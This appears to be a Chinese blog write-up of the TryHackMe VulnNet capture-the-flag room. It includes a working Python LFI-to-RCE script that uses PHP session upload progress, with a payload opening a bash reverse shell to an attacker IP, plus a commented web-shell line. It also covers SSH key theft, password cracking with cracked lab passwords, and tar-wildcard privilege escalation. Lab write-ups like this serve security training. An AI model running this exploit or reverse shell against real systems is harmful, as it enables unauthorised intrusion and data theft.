[Day17] THM VulnNet1

Recon

  • 扫 Port
    • rustscan -a 10.10.86.144 -r 1-65535
    • nmap -A -p22,80 10.10.86.144
  • 扫目录
    • python3 dirsearch.py -u http://10.10.86.144/
  • 发现登入页面
    • 戳了常见的 SQL injection 都不行
  • 观察网页连结
      • 透过 js formatter 自动进行格式化
      • 可以看到一个网址 broadcast.vulnnet.thm
        • 加到 /etc/hosts 指向同一个 IP
  • 访问 broadcast.vulnnet.thm
    • 发现需要登入

LFI 2 RCE

  • 观察首页 referer 参数
    • 发现可以 LFI
    • 用 Session upload progress 大法就可以 RCE 了!!
import grequests
sess_name = 'meowmeow'
sess_path = f'/var/lib/php/sessions/sess_{sess_name}'
base_url = 'http://vulnnet.thm/index.php'
param = "referer"

#code = "file_put_contents('/tmp/shell.php','<?php system($_GET[a])');"
code = '''system("bash -c 'bash -i >& /dev/tcp/10.13.21.55/7877 0>&1'");'''

while True:
    req = [grequests.post(base_url,
                            files={'f': "A"*0xffff},
                            data={'PHP_SESSION_UPLOAD_PROGRESS': f"pwned:<?php {code} ?>"},
                            cookies={'PHPSESSID': sess_name}),
            grequests.get(f"{base_url}?{param}={sess_path}")]

    result = grequests.map(req)
    if "pwned" in result[1].text:
        print(result[1].text)
        break
                   
  • 然後就 RCE 了
    • (感觉就不是正规解...ㄏㄏ)

提权

  • 先用豌豆扫描一次
      • 发现一个 Cronjob
    • 找到 backup
  • 观察 backup 档案,发现有 ssh-backup
    • 先偷出来再说
  • 解压缩
    • 发现是 id_rsa
  • 到家目录看使用者名称
    • 发现使用者是 server-management

SSH 登入

  • 准备 ssh 登入
    • 发现 id_rsa 需要密码 QQ
  • 用约翰爆破
    • python3 ../../ssh2john.py id_rsa > id_rsa_john
    • 密码是 oneTWO3gOyac
  • SSH 登入
    • 取得 user flag
  • 跑豌豆扫到 .htpasswd 密码的 hash
    • 猜测应该是给 broadcast.vulnnet.thm 用的
    • 用约翰爆破个
      • 密码是 9972761drmfsls
    • 猜测原始思路正规解法应该是,前面 LFI 到这个档案然後取得密码後来做进一步的动作
  • 访问 broadcast.vulnnet.thm
    • 使用帐号 developers
    • 密码 9972761drmfsls
      • 推测这应该是某个有 RCE 洞的 CMS

二次提权

  • 想起前面的 Backup 用了 tar *
  • 收 Shell
  • 取得 Root Flag

<<:  JS中的排序法_下

>>:  PERT 图

33岁转职者的前端笔记-DAY 3 什麽是 iframe 及使用心得

iframe 是 写网页常见的语法之一 在进公司前不知道有这语法 但通常一个网页内容 左侧或上方选单...

[Day 24] 筹码分析 - 内线消息

中碳 1723 由於今天中碳因为和鸿海签署材料开发合作备忘录,开盘後便直奔涨停板, 刚好我们来趁着这...

[DAY30]从上船到沉船30天心得

铁人30天心得 前言 k8s真的好硬rrrrr,写了30天,感觉才不到k8s 1%的内容,加上k8s...

06 | WordPress 段落区块 Paragraph Block

在撰写文章的时候,最常使用「标题区块 Heading Block」和「段落区块 Paragraph...

第30天:《听说做完380个实例,就能成为.NET Core大内高手》里面真的没怎麽讲.NET Core

今天是最後一天了,每天看这本书《听说做完380个实例,就能成为.NET Core大内高手》,真的里面...